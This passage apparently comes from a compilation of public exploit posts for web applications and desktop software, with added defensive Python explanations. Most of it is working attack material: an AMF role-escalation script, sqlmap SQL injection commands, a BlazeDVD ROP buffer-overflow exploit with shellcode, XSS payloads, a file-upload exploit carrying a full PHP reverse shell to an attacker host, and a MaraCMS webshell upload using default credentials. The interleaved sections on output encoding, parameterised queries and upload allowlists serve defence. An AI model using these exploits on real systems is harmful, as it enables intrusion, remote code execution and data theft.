        self.serialize += b"\x6E\x15\x74\x69\x6D\x65\x54\x6F\x4C\x69\x76\x65"
        self.serialize += b"\x0F\x68\x65\x61\x64\x65\x72\x73\x01\x06\x15\x75"
        self.serialize += b"\x70\x64\x61\x74\x65\x55\x73\x65\x72\x06\x49\x31"
        self.serialize += b"\x42\x38\x39\x37\x41\x38\x36\x2D\x37\x33\x42\x45"
        self.serialize += b"\x2D\x30\x35\x42\x31\x2D\x43\x45\x42\x33\x2D\x41"
        self.serialize += b"\x30\x35\x35\x30\x39\x36\x34\x31\x31\x34\x34\x04"
        self.serialize += b"\x00\x09\x05\x01\x0A\x81\x73\x1B\x64\x73\x2E\x6D"
        self.serialize += b"\x6F\x64\x65\x6C\x2E\x55\x73\x65\x72\x11\x70\x61"
        self.serialize += b"\x73\x73\x77\x6F\x72\x64\x0D\x63\x72\x65\x61\x74"
        self.serialize += b"\x65\x07\x74\x65\x6C\x07\x66\x61\x78\x09\x6E\x61"
        self.serialize += b"\x6D\x65\x0F\x61\x64\x64\x72\x65\x73\x73\x0D\x75"
        self.serialize += b"\x70\x64\x61\x74\x65\x05\x69\x64\x0D\x6D\x6F\x62"
        self.serialize += b"\x69\x6C\x65\x0F\x75\x44\x65\x6C\x65\x74\x65\x15"
        self.serialize += b"\x64\x65\x70\x61\x72\x74\x6D\x65\x6E\x74\x09\x72"
        self.serialize += b"\x6F\x6C\x65\x09\x72\x65\x61\x64\x0B\x65\x6D\x61"
        self.serialize += b"\x69\x6C\x0F\x63\x6F\x6D\x70\x61\x6E\x79\x06"  # -"
        self.serialize += self.amf_string(self.passwrd)                   # password
        self.serialize += b"\x03\x06\x19\x31\x31\x31\x2D\x32\x32\x32\x2D\x33"
        self.serialize += b"\x33\x33\x33\x06\x19\x33\x33\x33\x2D\x32\x32\x32"
        self.serialize += b"\x2D\x31\x31\x31\x31\x06"  # ---------------------"
        self.serialize += self.amf_string(self.display)                   # display name
        self.serialize += b"\x06\x1F\x49\x6D\x61\x67\x69\x6E\x61\x72\x79\x53"
        self.serialize += b"\x74\x72\x65\x65\x74\x03\x06"  # -----------------"
        self.serialize += self.amf_string(self.usrname)                   # username
        self.serialize += b"\x06\x01\x03\x06\x11\x53\x65\x63\x75\x72\x69\x74"
        self.serialize += b"\x79\x06"  # -------------------------------------"
        self.serialize += self.amf_string(self.suprole)                   # role
        self.serialize += b"\x03\x06\x15\x7A\x73\x6C\x40\x77\x68\x61\x2E\x62"
        self.serialize += b"\x61\x06\x07\x5A\x53\x4C\x06\x42\x01\x06\x17\x75"
        self.serialize += b"\x73\x65\x72\x53\x65\x72\x76\x69\x63\x65\x04\x00"
        self.serialize += b"\x0A\x0B\x01\x09\x44\x53\x49\x64\x06\x49\x34\x41"
        self.serialize += b"\x35\x46\x33\x33\x43\x33\x2D\x37\x31\x31\x46\x2D"
        self.serialize += b"\x35\x38\x45\x38\x2D\x39\x30\x35\x30\x2D\x39\x35"
        self.serialize += b"\x44\x31\x30\x30\x46\x33\x44\x45\x33\x45\x15\x44"
        self.serialize += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74\x06\x0D\x6D"
        self.serialize += b"\x79\x2D\x61\x6D\x66\x01"  # ---------------------"

        print("First try...")
        req = requests.post(self.address + self.ep, headers=self.headers,
                            cookies=self.cookies, data=self.serialize)
        #print(req.text.encode("utf-8"))
        if "Detected duplicate HTTP-based FlexSessions" in req.text:
            print("Second try...")
            req = requests.post(self.address + self.ep, headers=self.headers,
                                cookies=self.cookies, data=self.serialize)
            #print(req.text.encode("utf-8"))
            if "AcknowledgeMessage" in req.text:
                print("You are " + self.suprole + " now!")
            else:
                print("Didn't work.")
                exit(0)
        else:
            print("Try again!")

    def main(self):
        self.usage()
        self.amf()


if __name__ == '__main__':
    Escalada().main()
20. # Title: Online Book Store 1.0 - 'id' SQL Injection
# Exploit Author: Moaaz Taha (0xStorm)
# Date: 2020-08-21
# Vendor Homepage: https://www.sourcecodester.com/php/14383/online-book-store.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14383&title=Online+Book+Store
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

# Description
This parameter "id" is vulnerable to Union-Based blind SQL injection in this path "/online%20book%20store/detail.php?id=44" that leads to retrieve all databases.

#POC
sqlmap -u "http://TARGET/online%20book%20store/detail.php?id=44" -p id --dbms=mysql --threads=10 --technique=U --dbs
21. ## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic

# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'

## Change shellcode according to your needs
## Shellcode max size is around 700 bytes.

# bad chars:
# \x00, \x0a, \x0b, \x1a

# Python 2 script: str literals are byte strings, which the struct.pack concatenation below relies on.

import struct

# Binary mode so no byte of the chain is altered by newline translation on Windows
bfile = open('bfile.plf', 'wb')

buf = 'A'*84
buf += struct.pack('<L', 0x60325143)  # add esp, 0c; ret
buf += 'AAAA'                         # ret 04 ting from sehandler
buf += 'AAAA'*3                       # bypassing 12 bytes i.e 0c
buf += struct.pack('<L', 0x6402091b)  # add esp, 200; ret
buf += 'A'*500
buf += 'BBBB'                         # nseh
buf += struct.pack('<L', 0x640205b1)  # sehandler; add esp, 4a0; ret 0x04
#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA'                         # esp lands here.

# setting up the dynamic pointer for virtual protect
buf += struct.pack('<L', 0x61640e32)  # pop eax; retn.
buf += struct.pack('<L', 0xffed06a4)  # opp of 0012f95c; contains pointer to k32
buf += struct.pack('<L', 0x603267d4)  # neg eax, now eax contains 0012f95c
buf += struct.pack('<L', 0x616306ed)  # mov eax, dword ptr ds:[eax]
# now eax has the kernel32.dll pointer
buf += struct.pack('<L', 0x61640f09)  # push eax, pop esi, ret 04
buf += struct.pack('<L', 0x61640e32)  # pop eax ret
buf += 'XXXX'                         # ret 4 padding
buf += struct.pack('<L', 0xffff675d)  # neg to 98a3
buf += struct.pack('<L', 0x603267d4)  # neg eax; ret
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('<L', 0x6033dcc4)  # xchg eax,ecx; xor al,60; ret
buf += struct.pack('<L', 0x61644904)  # mov eax,esi; pop esi; ret
buf += 'XXXX'                         # pop esi padding
buf += struct.pack('<L', 0x641045f4)  # sub eax,ecx
# now eax has the pointer to VirtualProtect
#------------------------------------------------------------------------

# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM

# SETTING ESI
buf += struct.pack('<L', 0x61640f09)  # push eax, pop esi; ret 4

# SETTING EBP
buf += struct.pack('<L', 0x60327f8f)  # pop ebp; ret
buf += 'XXXX'                         # prev ret 4 padding
buf += struct.pack('<L', 0x60349b63)  # jmp esp

# SETTING EBX
buf += struct.pack('<L', 0x61629938)  # pop eax; ret
buf += struct.pack('<L', 0xfffffdff)  # neg to 0x201
buf += struct.pack('<L', 0x6033b16b)  # neg eax; ret
buf += struct.pack('<L', 0x61640124)  # xchg eax,ebx

# SETTING EDX
buf += struct.pack('<L', 0x616310e8)  # pop eax; ret
buf += struct.pack('<L', 0xffffffc0)  # neg of 0x40
buf += struct.pack('<L', 0x6033b16b)  # neg eax; retn
buf += struct.pack('<L', 0x61608ba2)  # xchg eax,edx

# SETTING ECX
buf += struct.pack('<L', 0x6404fbb9)  # pop ecx; ret
buf += struct.pack('<L', 0x1001524e)  # writable location

# SETTING EDI
buf += struct.pack('<L', 0x6032b0b8)  # pop edi; ret
buf += struct.pack('<L', 0x6162e802)  # retn (rop nop)

# SETTING EAX
buf += struct.pack('<L', 0x6162d638)  # pop eax; retn
buf += struct.pack('<L', 0x90909090)  # nop

# FINALLY PUSHAD
buf += struct.pack('<L', 0x6033cd4a)  # push ad

buf += '\x90\x90\x90\x90'*4

# shellcode generated using:
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
# -b '\x00\x0a\x0b\x1a'
buf += (
"\xbb\x42\xa8\xb5\x43\xda\xc7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x41\x83\xc2\x04\x31\x5a\x0f\x03\x5a\x4d\x4a\x40\x9a\xba\x11"
"\x72\x69\x18\xd2\xb4\x40\xd2\x6d\x86\xad\x76\x19\x99\x1d\xfd"
"\x6b\x56\xd5\x77\x88\xed\xaf\x7f\x3b\x8f\x0f\xf4\x0d\x48\x1f"
"\x12\x07\x5b\xc6\x23\x36\x64\x18\x43\x33\xf7\xff\xa7\xc8\x4d"
"\x3c\x2c\x9a\x65\x44\x33\xc9\xfd\xfe\x2b\x86\x58\xdf\x4a\x73"
"\xbf\x2b\x05\x08\x74\xdf\x94\xe0\x44\x20\xa7\x3c\x5a\x72\x43"
"\x7c\xd7\x8c\x8a\xb2\x15\x92\xcb\xa6\xd2\xaf\xaf\x1c\x33\xa5"
"\xae\xd6\x19\x61\x31\x02\xfb\xe2\x3d\x9f\x8f\xaf\x21\x1e\x7b"
"\xc4\x5d\xab\x7a\x33\xd4\xef\x58\xdf\x87\x2c\x12\xd7\x6e\x67"
"\xda\x0d\xf9\x45\xb5\x43\xb7\x47\xaa\x0e\xaf\xc7\xcd\x50\xd0"
"\x71\x74\xab\x95\xfc\xaf\x51\x9a\x87\x4c\xb2\x0e\x60\xe2\x45"
"\x51\x8f\x72\xfc\xa5\x18\xe9\x93\x95\x99\x99\x58\xe7\x37\x3e"
"\xf7\x72\x3b\xdb\x75\x4c\x60\xab\x26\x88\x9c\x25\x30\x86\x5f"
"\x60\xb9\xaf\x62\xdb\x7a\x07\xc0\x91\xc0\xd0\x19\x0e\x6b\x36"
"\x7e\xb1\x74\x39\xe9\x22\xf3\x9d\xca\xd4\x62\x7a\x6e\x67\x0d"
"\xc9\x15\x14\xbe\xe0\x0e\x52\x1c\x26\xbb\xea\x7e\x4e\xcb\xb4"
"\xa0\xae\x43\x20\xcc\xcf\xff\x9b\xc7\x87\x4c\xf8\xd2\x1e\xad"
"\x31\x0f\x72\x7d\x63\xfd\x8d\x51\xb2\xc1\x21\xad\xe0\xc9"
)

buf += '\x90\x90\x90\x90'*5
buf += 'E'*200

bfile.write(buf)
bfile.close()
22. # Exploit Title: Mara CMS 7.5 - Reflective Cross-Site Scripting
# Google Dork: NA
# Date: 2020-08-01
# Exploit Author: George Tsimpidas
# Vendor Homepage: https://sourceforge.net/projects/maracms/
# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
# Version: 7.5
# Tested on: Kali Linux(x64)
# CVE : CVE-2020-24223

Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability.

Description :
This Reflected XSS vulnerability allows any authenticated user to inject malicious code via the parameter contact.php?theme=<inject>. The vulnerability exists because the parameter is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser.

PoC :
Use Payload : seven69387';alert(1)//154
Path : http://localhost/contact.php?theme=< inject payload here>

Injection Example :
http://localhost/contact.php?theme=seven69387';alert(1)//154
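The three XSS posts above (SymphonyCMS stored XSS via fields[body], Nagios Log Server stored XSS via the Full Name and Username fields, and the Mara CMS reflected XSS in the theme parameter) differ in output context: the first two land in HTML text, while the Mara payload seven69387';alert(1)//154 closes a single-quoted JavaScript string literal and appends code, with // commenting out the rest of the line. As an added Python example (not code from any of those projects or advisories), here are the two vulnerable rendering shapes next to context-appropriate encoders; the templates are assumed illustrations.

```python
import html
import json


def render_article_body_unsafe(body):
    """Stored-XSS shape: author-controlled text is concatenated straight into HTML, so a
    stored <script> runs for every later viewer, the admin included."""
    return '<div class="body">%s</div>' % body


def render_article_body_safe(body):
    """HTML text context: html.escape turns & < > " ' into entities, so stored markup is inert."""
    return '<div class="body">%s</div>' % html.escape(body, quote=True)


def render_theme_script_unsafe(theme):
    """Reflected-XSS shape behind a JavaScript-string injection: the query parameter is
    dropped into a single-quoted JS literal, so a quote closes it and code follows."""
    return "<script>var theme = '%s';</script>" % theme


def js_string_literal(value):
    """JavaScript string literal safe for an inline <script>: json.dumps quotes the value and
    escapes quotes, backslashes, control and non-ASCII characters (ensure_ascii); < > & are
    additionally \\u-escaped so the HTML parser can never see '</script>' inside it."""
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_theme_script_safe(theme):
    """JS string context: emit a proper literal instead of quoting by hand."""
    return "<script>var theme = %s;</script>" % js_string_literal(theme)


# Constructed samples, matching the payloads in the posts above.
STORED_PAYLOAD = "<script>alert('XSS')</script>"
REFLECTED_PAYLOAD = "seven69387';alert(1)//154"

if __name__ == "__main__":
    print(render_article_body_unsafe(STORED_PAYLOAD))
    print(render_article_body_safe(STORED_PAYLOAD))
    print(render_theme_script_unsafe(REFLECTED_PAYLOAD))
    print(render_theme_script_safe(REFLECTED_PAYLOAD))
```

The encoder has to match the sink: html.escape does nothing useful inside a JavaScript string (a quote survives as &#x27; only if the browser later HTML-decodes it, and inside <script> it does not), and a JS literal encoder is not an HTML encoder.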
23. # Exploit Title: Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)
# Date: 2020-08-19
# Exploit Author: c0mpu7er(@ymbank.cn)
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.8.zip
# Version: 1.4.7
# Tested on: PHP 5.4.45, Apache 2.4.23 ,mysql 5.0

1. Description:
----------------------
FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------
In Burpsuite intercept the request from one of the affected pages with 'fuel_replace_id' parameter and save it like 33.txt
Then run SQLmap to extract the data from the database:

python sqlmap.py -r 33.txt --dbs

3.Example payload:
Content-Disposition: form-data; name="fuel_replace_id"

11%27

4. Burpsuite request payload:
----------------------
POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1
Host: 192.168.1.12
Content-Length: 347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.12
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135
Connection: close

------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="fuel_replace_id"

11*
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="Submit"

Submit
------WebKitFormBoundarygI1zKZoBINTcL87g
Content-Disposition: form-data; name="fuel_inline"

1
------WebKitFormBoundarygI1zKZoBINTcL87g--

5. Timeline:
----------------------
2020-08-20: SQLi vulnerability found in Fuel CMS 1.4.8
2020-08-20: Reported vulnerability to vendor
2020-08-22: Vendor has patched the SQLi vulnerability in version 1.4.9
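The three SQL injection posts (Online Shopping Alphaware 'id', Online Book Store 'id' and Fuel CMS 'fuel_replace_id') are the same defect: a request parameter pasted into SQL text. As an added Python example on an in-memory SQLite database (constructed schema and rows; not code from any of those applications), this shows the union-based and error-based signals that sqlmap's --technique=U and --technique=E look for, next to the parameterised query that removes both. SQLite's error text differs from MySQL's, but the presence of an error on a stray quote is the same oracle.

```python
import sqlite3


def make_db():
    """Constructed sample schema: a public 'books' table and a 'users' table that the
    detail query must never expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE books(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO books VALUES (44, 'Applied Cryptography');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def book_detail_unsafe(conn, book_id):
    """String-built query, the pattern behind detail.php?id=44: the parameter becomes
    part of the SQL text, so it can add a UNION or break the syntax."""
    sql = "SELECT id, title FROM books WHERE id = %s" % book_id
    return conn.execute(sql).fetchall()


def book_detail_safe(conn, book_id):
    """Parameterised query: the value travels separately from the SQL and is never parsed
    as SQL. Casting to int first also rejects anything that is not a numeric id."""
    try:
        value = int(book_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, title FROM books WHERE id = ?", (value,)).fetchall()


# Constructed payloads illustrating the two sqlmap techniques named in the posts.
UNION_PAYLOAD = "0 UNION SELECT username, password_hash FROM users"  # union-based: rows show up in the page
ERROR_PAYLOAD = "11'"                                                # error-based: the stray quote raises


def probe(conn, handler, payload):
    """Return ('rows', rows) or ('error', message) so both oracles are visible."""
    try:
        return ("rows", handler(conn, payload))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for handler in (book_detail_unsafe, book_detail_safe):
        for payload in ("44", UNION_PAYLOAD, ERROR_PAYLOAD):
            print(handler.__name__, repr(payload), "->", probe(db, handler, payload))
```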
24. #!/usr/bin/python3
#-*- coding: utf-8 -*-
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-08-31
# Exploit Author: Luis Noriega (@nogagmx)
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04.4 LTS
# CVE : N/A
# Usage:
# python3 exploit.py --url http://URL/cmsms/admin/login.php -u admin -p password -lhost LHOST -lport LPORT

from urllib.parse import urlparse
import requests
import argparse
import string
import random
import json
import sys


def parse_url(URL):
    # Derive the FileManager module endpoint from the admin login URL
    t = urlparse(URL)
    return t.scheme + '://' + t.netloc + t.path.split('login.php')[0] + 'moduleinterface.php'


parser = argparse.ArgumentParser(description='CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell')
parser.add_argument('--url', dest='URL', help='URL to admin pane </admin/login.php>', required=True)
parser.add_argument('-u', dest='USERNAME', help='Username', required=True)
parser.add_argument('-p', dest='PASSWORD', help='Password', required=True)
parser.add_argument('-lhost', dest='IP', help='The listen address', required=True)
parser.add_argument('-lport', dest='PORT', help='The listen port', required=True)
args = parser.parse_args()

login_data = {'username': "", "password": "", "loginsubmit": "Submit"}

# PHP reverse shell (pentestmonkey style); LHOST/LPORT are substituted below
PAYLOAD = '<?php set_time_limit (0); $VERSION = "1.0"; $ip = "%s"; $port = "%s"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>' % (args.IP, args.PORT)

# Random name with a .phar extension: the file manager does not block it, and PHP executes it
FILENAME = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.phar'
file = {'m1_files[]': (FILENAME, PAYLOAD)}
upload_data = {"mact": "FileManager,m1_,upload,0", "__c": "", "disable_buffer": "1"}
URL_UPLOAD = parse_url(args.URL)

print("[ + ] Connection to the CMS Made Simple Admin Portal located at " + args.URL)
print("[ + ] Using " + args.USERNAME + ":" + args.PASSWORD)
login_data['username'] = args.USERNAME
login_data['password'] = args.PASSWORD

try:
    session = requests.session()
    req = session.post(args.URL, data=login_data)
    # The __c cookie set at login must be echoed back as a form field
    upload_data["__c"] = session.cookies["__c"]
    print("[ + ] %s logged in successfully!" % (args.USERNAME))
    response = requests.post(URL_UPLOAD, files=file, cookies=session.cookies, data=upload_data)
    data = response.json()
    print("[ + ] %s file uploaded." % (FILENAME))
    # The JSON response carries the public URL of the uploaded file
    URL_TRIGGER = data[0]['url']
    input("[ ! ] Set up your nc listener <nc -nvlp %s>, then press Enter to exploit.." % (args.PORT))
    print("[ + ] Pwned!!")
    response = requests.get(URL_TRIGGER, cookies=session.cookies)
    print("[ + ] Bye")
except Exception:
    print("[ x ] Something went wrong, try again.")
    sys.exit(1)
25. # Exploit Title: Mara CMS 7.5 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-08-31
# Exploit Author: Michele Cisternino (0blio_)
# Vendor Homepage: https://sourceforge.net/projects/maracms/
# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
# Version: 7.5
# Tested on: Kali Linux(x64)
# CVE: N/A

# Description
MaraCMS 7.5 is vulnerable to Authenticated Remote Code Execution. In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS as 'admin' or 'manager'. The file uploader fails to check the extensions of files uploaded by the user, so it is possible to upload a webshell and get RCE.

# PoC
1. Log in to MaraCMS. Default credentials are:
   Username: admin
   Password: changeme

2. Navigate to the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with content '<?php system($_GET["cmd"]); ?>'. A request similar to the following will be made:

POST /codebase/handler.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1202504167994776142974823268
Content-Length: 1282
Origin: http://localhost
Connection: close
Referer: http://localhost/codebase/dir.php?type=filenew
Cookie: your_sitename_session_session=krevi5f3gr416p3o7cqdk4j1vv
Upgrade-Insecure-Requests: 1

-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="authenticated"

MQ==
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="action"

dXBsb2Fk
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="type"

filenew
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="files[]"; filename="webshell.php"
Content-Type: application/x-php

<?php system($_GET["cmd"]); ?>
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="usr"

YWRtaW4=
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="pwd"

MWUyNzUwMTA3OTgyNzQ2NTQ5ZDZlYWY0MWNmMzcwZTBlZTc3NWNiNWZiNTExMWNhOGI5ZWNjNWI0M2JkOGE2NA==
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="authenticated"

MQ==
-----------------------------1202504167994776142974823268
Content-Disposition: form-data; name="destdir"


-----------------------------1202504167994776142974823268--

3. Execute remote commands by navigating to: http://target/webshell.php?cmd=whoami
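Both of the upload posts above (the CMS Made Simple exploit in post 24 and the MaraCMS advisory in post 25) come down to the same server-side mistake: the upload handler decides whether a file is dangerous by looking at its name, and either checks nothing (MaraCMS) or misses an extension that PHP will still execute (the CMS Made Simple exploit names its payload `.phar`). The following Python is an added illustration, not code from either project and not a reconstruction of their actual handlers: `denylist_check` models the weak pattern (block only `.php`), and `allowlist_check` shows the check a file manager should make instead. The allowed-extension set is an assumption chosen for the example.

```python
import os
import secrets

# Allowlist for the hardened check: only extensions the file manager is meant to
# serve as static content. This set is an assumption made for the example.
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def denylist_check(filename: str) -> bool:
    """The weak pattern: accept anything whose last extension is not '.php'.

    Every other extension a typical mod_php / php-fpm setup executes (.phar,
    .phtml, .php5, ...) passes, and so does 'shell.php.jpg'.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext != "php"


def allowlist_check(filename: str) -> bool:
    """Hardened check: normalise the client-supplied name, then require that
    every extension in the chain is on the allowlist."""
    # Drop any directory components the client sent and refuse embedded NULs,
    # which older runtimes used to truncate names at ("shell.php\0.jpg").
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or "\x00" in name:
        return False
    # Trailing dots / spaces are stripped by Windows and some servers, which
    # would turn "shell.php." into "shell.php" after the check has run.
    if name != name.rstrip(". "):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no extension at all, or a dotfile such as .htaccess
    # Checking the whole chain (not just the last part) also rejects
    # "shell.php.jpg" on servers that map any matching extension to PHP.
    return all(ext in ALLOWED_EXTS for ext in parts[1:])


def stored_name(filename: str) -> str:
    """Name the file on disk with a random token plus its (allowlisted)
    extension, so the client never controls the stored path."""
    if not allowlist_check(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def compare(names):
    """Return {name: (denylist_result, allowlist_result)} for a list of names."""
    return {n: (denylist_check(n), allowlist_check(n)) for n in names}


if __name__ == "__main__":
    # Constructed sample names, including the two used on this page
    samples = ["webshell.php", "abcde.phar", "shell.phtml", "shell.php.jpg",
               "photo.JPG", "../../webshell.php", "image.jpg."]
    for n, (weak, strong) in compare(samples).items():
        print(f"{n!r:24} denylist={weak!s:5} allowlist={strong}")
```

Even with the allowlist, uploads belong outside the document root (or in a directory where script execution is disabled) and should be served through a handler that sets a fixed Content-Type; the name check is the first gate, not the only one.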